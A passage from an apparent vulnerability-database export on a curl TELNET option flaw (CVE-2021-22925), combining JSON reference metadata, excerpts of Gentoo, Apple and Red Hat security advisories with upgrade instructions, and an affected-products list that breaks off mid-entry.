        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38369"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ibm-security/ibmsecurity/issues/416)."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7147932."
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mga/user/mgmt/otp/totp"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7145828."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7158790"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/cvenew)"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mmfa/user/mgmt/authenticators"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-2068"
      },
      {
        "db": "PACKETSTORM",
        "id": "168022"
      },
      {
        "db": "PACKETSTORM",
        "id": "169396"
      },
      {
        "db": "PACKETSTORM",
        "id": "168112"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170196"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "175432"
      },
      {
        "db": "PACKETSTORM",
        "id": "170179"
      },
      {
        "db": "PACKETSTORM",
        "id": "182466"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2022-2068",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168022",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "169396",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168112",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170741",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170196",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170165",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "175432",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170179",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "182466",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2022-2068",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2022-06-21T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-2068",
        "ident": null
      },
      {
        "date": "2022-08-10T15:50:41",
        "db": "PACKETSTORM",
        "id": "168022",
        "ident": null
      },
      {
        "date": "2022-06-28T19:12:00",
        "db": "PACKETSTORM",
        "id": "169396",
        "ident": null
      },
      {
        "date": "2022-08-19T15:03:34",
        "db": "PACKETSTORM",
        "id": "168112",
        "ident": null
      },
      {
        "date": "2023-01-26T15:29:09",
        "db": "PACKETSTORM",
        "id": "170741",
        "ident": null
      },
      {
        "date": "2022-12-12T23:02:21",
        "db": "PACKETSTORM",
        "id": "170196",
        "ident": null
      },
      {
        "date": "2022-12-08T21:28:21",
        "db": "PACKETSTORM",
        "id": "170165",
        "ident": null
      },
      {
        "date": "2023-10-31T13:11:25",
        "db": "PACKETSTORM",
        "id": "175432",
        "ident": null
      },
      {
        "date": "2022-12-09T14:52:40",
        "db": "PACKETSTORM",
        "id": "170179",
        "ident": null
      },
      {
        "date": "2024-11-04T16:28:12",
        "db": "PACKETSTORM",
        "id": "182466",
        "ident": null
      },
      {
        "date": "2022-06-21T15:15:09.060000",
        "db": "NVD",
        "id": "CVE-2022-2068",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-2068",
        "ident": null
      },
      {
        "date": "2025-11-03T22:15:58.023000",
        "db": "NVD",
        "id": "CVE-2022-2068",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "175432"
      }
    ],
    "trust": 0.1
  },
  "title": {
    "_id": null,
    "data": "Red Hat Security Advisory 2022-6024-01",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168022"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "_id": null,
    "data": "arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "169396"
      },
      {
        "db": "PACKETSTORM",
        "id": "175432"
      }
    ],
    "trust": 0.2
  }
}

VAR-202108-2221

Vulnerability from variot - Updated: 2026-03-09 20:13

curl supports the -t command line option, known as CURLOPT_TELNETOPTIONSin libcurl. This rarely used option is used to send variable=content pairs toTELNET servers.Due to flaw in the option parser for sending NEW_ENV variables, libcurlcould be made to pass on uninitialized data from a stack based buffer to theserver. Therefore potentially revealing sensitive internal information to theserver using a clear-text network protocol.This could happen because curl did not call and use sscanf() correctly whenparsing the string provided by the application. cURL Exists in the use of uninitialized resources.Information may be obtained. Summary:

An update is now available for OpenShift Logging 5.1. Solution:

For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html

For Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html

Bugs fixed (https://bugzilla.redhat.com/):

Gentoo Linux Security Advisory GLSA 202212-01

                                       https://security.gentoo.org/

Severity: High Title: curl: Multiple Vulnerabilities Date: December 19, 2022 Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365 ID: 202212-01

Synopsis

Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.

Background

A command line tool and library for transferring data with URLs.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/curl < 7.86.0 >= 7.86.0

Description

Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.

Impact

Please review the referenced CVE identifiers for details.

Workaround

There is no known workaround at this time.

Resolution

All curl users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"

References

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202212-01

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . Description:

Gatekeeper Operator v0.2

Gatekeeper is an open source project that applies the OPA Constraint Framework to enforce policies on your Kubernetes clusters.

This advisory contains the container images for Gatekeeper that include security updates, and container upgrades. For support options for any other use, see the Gatekeeper open source project website at: https://open-policy-agent.github.io/gatekeeper/website/docs/howto/.

Security updates:

golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)
golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)
Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

The requirements to apply the upgraded images are different whether or not you used the operator. Complete the following steps, depending on your installation:

- Upgrade gatekeeper operator: The gatekeeper operator that is installed by the gatekeeper operator policy has installPlanApproval set to Automatic. This setting means the operator will be upgraded automatically when there is a new version of the operator. No further action is required for upgrade. If you changed the setting for installPlanApproval to manual, then you must view each cluster to manually approve the upgrade to the operator.
- Upgrade gatekeeper without the operator: The gatekeeper version is specified as part of the Gatekeeper CR in the gatekeeper operator policy. To upgrade the gatekeeper version: a) Determine the latest version of gatekeeper by visiting: https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. b) Click the tag dropdown, and find the latest static tag. An example tag is 'v3.3.0-1'. c) Edit the gatekeeper operator policy and update the image tag to use the latest static tag. For example, you might change this line to image: 'registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1'. Bugs fixed (https://bugzilla.redhat.com/):

2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

APPLE-SA-2021-09-20-7 Additional information for APPLE-SA-2021-09-13-3 macOS Big Sur 11.6

macOS Big Sur 11.6 addresses the following issues.

CoreGraphics Available for: macOS Big Sur Impact: Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: An integer overflow was addressed with improved input validation. CVE-2021-30860: The Citizen Lab

CUPS Available for: macOS Big Sur Impact: A local attacker may be able to elevate their privileges Description: A permissions issue existed. This issue was addressed with improved permission validation. CVE-2021-30827: an anonymous researcher Entry added September 20, 2021

CUPS Available for: macOS Big Sur Impact: A local user may be able to read arbitrary files as root Description: This issue was addressed with improved checks. CVE-2021-30828: an anonymous researcher Entry added September 20, 2021

CUPS Available for: macOS Big Sur Impact: A local user may be able to execute arbitrary files Description: A URI parsing issue was addressed with improved parsing. CVE-2021-22925 Entry added September 20, 2021

CVMS Available for: macOS Big Sur Impact: A local attacker may be able to elevate their privileges Description: A memory corruption issue was addressed with improved state management. CVE-2021-30832: Mickey Jin (@patch1t) of Trend Micro Entry added September 20, 2021

FontParser Available for: macOS Big Sur Impact: Processing a maliciously crafted dfont file may lead to arbitrary code execution Description: This issue was addressed with improved checks. CVE-2021-30841: Xingwei Lin of Ant Security Light-Year Lab CVE-2021-30842: Xingwei Lin of Ant Security Light-Year Lab CVE-2021-30843: Xingwei Lin of Ant Security Light-Year Lab Entry added September 20, 2021

Gatekeeper Available for: macOS Big Sur Impact: A malicious application may bypass Gatekeeper checks Description: This issue was addressed with improved checks. CVE-2021-30853: Gordon Long (@ethicalhax) of Box, Inc. Entry added September 20, 2021

Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2021-30830: Zweig of Kunlun Lab Entry added September 20, 2021

Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds read was addressed with improved input validation. CVE-2021-30865: Zweig of Kunlun Lab Entry added September 20, 2021

Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved locking. CVE-2021-30857: Zweig of Kunlun Lab Entry added September 20, 2021

Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A type confusion issue was addressed with improved state handling. CVE-2021-30859: Apple Entry added September 20, 2021

libexpat Available for: macOS Big Sur Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed by updating expat to version 2.4.1. CVE-2013-0340: an anonymous researcher Entry added September 20, 2021

Preferences Available for: macOS Big Sur Impact: An application may be able to access restricted files Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. CVE-2021-30855: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com) Entry added September 20, 2021

Sandbox Available for: macOS Big Sur Impact: A user may gain access to protected parts of the file system Description: An access issue was addressed with improved access restrictions. CVE-2021-30850: an anonymous researcher Entry added September 20, 2021

SMB Available for: macOS Big Sur Impact: A local user may be able to read kernel memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2021-30845: Peter Nguyen Vu Hoang of STAR Labs Entry added September 20, 2021

SMB Available for: macOS Big Sur Impact: A remote attacker may be able to leak memory Description: A logic issue was addressed with improved state management. CVE-2021-30844: Peter Nguyen Vu Hoang of STAR Labs Entry added September 20, 2021

WebKit Available for: macOS Big Sur Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: A use after free issue was addressed with improved memory management. CVE-2021-30858: an anonymous researcher

Additional recognition

APFS We would like to acknowledge Koh M. Nakagawa of FFRI Security, Inc. for their assistance. Entry added September 20, 2021

App Support We would like to acknowledge @CodeColorist, an anonymous researcher for their assistance. Entry added September 20, 2021

CoreML We would like to acknowledge hjy79425575 working with Trend Micro Zero Day Initiative for their assistance. Entry added September 20, 2021

CUPS We would like to acknowledge an anonymous researcher for their assistance. Entry added September 20, 2021

Kernel We would like to acknowledge Anthony Steinhauser of Google's Safeside project for their assistance. Entry added September 20, 2021

Sandbox We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance. Entry added September 20, 2021

smbx We would like to acknowledge Zhongcheng Li (CK01) for their assistance. Entry added September 20, 2021

Installation note:

This update may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/

Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmFI888ACgkQeC9qKD1p rhi/Bg/9GiqXl8sxPjDpATJqneZ1GcAxWxBZgkFrcLV/cMwrVqniWsOeVHqHjMSY eJUkGehUtKsYE0g8Uk0qJqOUl3dxxGJpIDytOQJB3TFdd1BpZSK/tOChVem1JV1B +CMhqDnmR/u7bLqfCr1p6J5QJNHjTjgBA4RthdzZZ52pLGql7/2qfaJwpeHkheS4 5EKmch8zh0CGRqrUTg1HgY67ierNsz47jIU6n7UeMwjskRU3xM9VqJ9s4eKGAtSv 4Ry16pv0xUZ4cmL5EiLm2/eFbY8ByCji7jYPP0POBO4l518TGpaX2PaZBP9v0rrD t6cPEZHnsRaZ49OYak6z9iA8teKGSs6aCMuzSxExvlT8+YySf1o1nefbRH/tZMfn bwSO0ZyPsS9WYyuG/zX08U3CKOTkjqhLaOwVwte+cAeg2QS85aa9XPMG6PKcpyfu R7auxS92+Dg+R+97dAsI9TprSutCTw4iY8lyK9MVJSnh+zQSZEihUh4EaSufTHRC NlOSHvsTfXqsHaeed6sVKyX4ADHCUvRbCCIrqJKUs6waNd2T2XF7SzvgTSDJMHU9 4AL/jpnltTjDJTtMO999VZKNzYurrGiHvBs5zHWr91+eaHW8YGdsDERsX3BFYLe3 85i+Yge0iXlP7mT32cWxIw4AWDFITFiHnmV1/cdsCd2GIkqkhFw= =9bjT -----END PGP SIGNATURE-----

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: ACS 3.67 security and enhancement update Advisory ID: RHSA-2021:4902-01 Product: RHACS Advisory URL: https://access.redhat.com/errata/RHSA-2021:4902 Issue date: 2021-12-01 CVE Names: CVE-2018-20673 CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 CVE-2020-16135 CVE-2020-24370 CVE-2020-27304 CVE-2021-3200 CVE-2021-3445 CVE-2021-3580 CVE-2021-3749 CVE-2021-3800 CVE-2021-3801 CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-23343 CVE-2021-23840 CVE-2021-23841 CVE-2021-27645 CVE-2021-28153 CVE-2021-29923 CVE-2021-32690 CVE-2021-33560 CVE-2021-33574 CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-39293 =====================================================================

Summary:

Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS).

Description:

The release of RHACS 3.67 provides the following new features, bug fixes, security patches and system changes:

OpenShift Dedicated support

RHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on Amazon Web Services and Google Cloud Platform.

Use OpenShift OAuth server as an identity provider If you are using RHACS with OpenShift, you can now configure the built-in OpenShift OAuth server as an identity provider for RHACS.
Enhancements for CI outputs Red Hat has improved the usability of RHACS CI integrations. CI outputs now show additional detailed information about the vulnerabilities and the security policies responsible for broken builds.
Runtime Class policy criteria Users can now use RHACS to define the container runtime configuration that may be used to run a pod’s containers using the Runtime Class policy criteria.

Security Fix(es):

civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API (CVE-2020-27304)
nodejs-axios: Regular expression denial of service in trim function (CVE-2021-3749)
nodejs-prismjs: ReDoS vulnerability (CVE-2021-3801)
golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet (CVE-2021-29923)
helm: information disclosure vulnerability (CVE-2021-32690)
golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) (CVE-2021-39293)
nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fixes The release of RHACS 3.67 includes the following bug fixes:

Previously, when using RHACS with the Compliance Operator integration, RHACS did not respect or populate Compliance Operator TailoredProfiles. This has been fixed.
Previously, the Alpine Linux package manager (APK) in Image policy looked for the presence of apk package in the image rather than the apk-tools package. This issue has been fixed.

System changes The release of RHACS 3.67 includes the following system changes:

Scanner now identifies vulnerabilities in Ubuntu 21.10 images.
The Port exposure method policy criteria now include route as an exposure method.
The OpenShift: Kubeadmin Secret Accessed security policy now allows the OpenShift Compliance Operator to check for the existence of the Kubeadmin secret without creating a violation.
The OpenShift Compliance Operator integration now supports using TailoredProfiles.
The RHACS Jenkins plugin now provides additional security information.
When you enable the environment variable ROX_NETWORK_ACCESS_LOG for Central, the logs contain the Request URI and X-Forwarded-For header values.
The default uid:gid pair for the Scanner image is now 65534:65534.
RHACS adds a new default Scope Manager role that includes minimum permissions to create and modify access scopes.
If microdnf is part of an image or shows up in process execution, RHACS reports it as a security violation for the Red Hat Package Manager in Image or the Red Hat Package Manager Execution security policies.
In addition to manually uploading vulnerability definitions in offline mode, you can now upload definitions in online mode.
You can now format the output of the following roxctl CLI commands in table, csv, or JSON format: image scan, image check & deployment check
You can now use a regular expression for the deployment name while specifying policy exclusions
Solution:

To take advantage of these new features, fixes and changes, please upgrade Red Hat Advanced Cluster Security for Kubernetes to version 3.67.

Bugs fixed (https://bugzilla.redhat.com/):

1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe 1978144 - CVE-2021-32690 helm: information disclosure vulnerability 1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet 1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function 2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability 2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) 2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API

JIRA issues fixed (https://issues.jboss.org/):

RHACS-65 - Release RHACS 3.67.0

References:

https://access.redhat.com/security/cve/CVE-2018-20673 https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-12762 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-16135 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2020-27304 https://access.redhat.com/security/cve/CVE-2021-3200 https://access.redhat.com/security/cve/CVE-2021-3445 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3749 https://access.redhat.com/security/cve/CVE-2021-3800 https://access.redhat.com/security/cve/CVE-2021-3801 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-20266 https://access.redhat.com/security/cve/CVE-2021-22876 https://access.redhat.com/security/cve/CVE-2021-22898 https://access.redhat.com/security/cve/CVE-2021-22925 https://access.redhat.com/security/cve/CVE-2021-23343 https://access.redhat.com/security/cve/CVE-2021-23840 https://access.redhat.com/security/cve/CVE-2021-23841 https://access.redhat.com/security/cve/CVE-2021-27645 https://access.redhat.com/security/cve/CVE-2021-28153 https://access.redhat.com/security/cve/CVE-2021-29923 https://access.redhat.com/security/cve/CVE-2021-32690 https://access.redhat.com/security/cve/CVE-2021-33560 https://access.redhat.com/security/cve/CVE-2021-33574 https://access.redhat.com/security/cve/CVE-2021-35942 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-39293 https://access.redhat.com/security/updates/classification/#moderate

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYafeGdzjgjWX9erEAQgZ8Q/9H5ov4ZfKZszdJu0WvRMetEt6DMU2RTZr Kjv4h4FnmsMDYYDocnkFvsRjcpdGxtoUShAqD6+FrTNXjPtA/v1tsQTJzhg4o50w tKa9T4aHfrYXjGvWgQXJJEGmGaYMYePUOv77x6pLfMB+FmgfOtb8kzOdNzAtqX3e lq8b2DrQuPSRiWkUgFM2hmS7OtUsqTIShqWu67HJdOY74qDN4DGp7GnG6inCrUjV x4/4X5Fb7JrAYiy57C5eZwYW61HmrG7YHk9SZTRYgRW0rfgLncVsny4lX1871Ch2 e8ttu0EJFM1EJyuCJwJd1Q+rhua6S1VSY+etLUuaYme5DtvozLXQTLUK31qAq/hK qnLYQjaSieea9j1dV6YNHjnvV0XGczyZYwzmys/CNVUxwvSHr1AJGmQ3zDeOt7Qz vguWmPzyiob3RtHjfUlUpPYeI6HVug801YK6FAoB9F2BW2uHVgbtKOwG5pl5urJt G4taizPtH8uJj5hem5nHnSE1sVGTiStb4+oj2LQonRkgLQ2h7tsX8Z8yWM/3TwUT PTBX9AIHwt8aCx7XxTeEIs0H9B1T9jYfy06o9H2547un9sBoT0Sm7fqKuJKic8N/ pJ2kXBiVJ9B4G+JjWe8rh1oC1yz5Q5/5HZ19VYBjHhYEhX4s9s2YsF1L1uMoT3NN T0pPNmsPGZY= =ux5P -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Summary:

The Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:

Security Fix(es):

nodejs-immer: prototype pollution may lead to DoS or remote code execution (CVE-2021-3757)
mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC) (CVE-2021-3948)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:

For details on how to install and use MTC, refer to:

https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html

Bugs fixed (https://bugzilla.redhat.com/):

Solution:

See the Red Hat OpenShift Container Platform 4.6 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index See the Red Hat OpenShift Container Platform 4.7 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index See the Red Hat OpenShift Container Platform 4.8 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index See the Red Hat OpenShift Container Platform 4.9 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.0.1"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "_id": null,
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.3"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.3.1"
      },
      {
        "_id": null,
        "model": "sinema remote connect server",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.4"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "_id": null,
        "model": "sinec infrastructure network services",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0.1.1"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.1.0"
      },
      {
        "_id": null,
        "model": "mysql server",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.26"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.2.1"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "_id": null,
        "model": "mysql server",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.7.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.5"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "mysql server",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.0"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.2"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.58"
      },
      {
        "_id": null,
        "model": "clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.57"
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.59"
      },
      {
        "_id": null,
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "mysql server",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.7.35"
      },
      {
        "_id": null,
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "curl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.78.0"
      },
      {
        "_id": null,
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.15.7"
      },
      {
        "_id": null,
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "curl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.7"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.1"
      },
      {
        "_id": null,
        "model": "apple mac os x",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30a2\u30c3\u30d7\u30eb",
        "version": null
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "_id": null,
        "model": "macos",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30a2\u30c3\u30d7\u30eb",
        "version": null
      },
      {
        "_id": null,
        "model": "mysql",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30aa\u30e9\u30af\u30eb",
        "version": null
      },
      {
        "_id": null,
